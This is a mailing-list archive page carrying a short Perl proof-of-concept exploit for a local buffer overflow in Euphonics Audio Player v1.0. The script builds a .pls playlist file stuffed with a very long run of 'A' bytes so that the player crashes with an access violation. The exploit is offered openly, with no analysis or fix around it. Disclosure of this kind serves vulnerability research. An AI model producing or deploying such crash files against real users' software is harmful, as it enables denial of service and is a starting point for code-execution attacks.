Euphonics Audio Player v1.0 (.pls) Local BOF POC

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97@xxxxxxxxxxxxxx




my $file="dark.pls";

$accessviolation = "\x41\x41\x41\x41" x 408973 ;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $accessviolation ;
close($FILE);
print "$file creation finished";

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux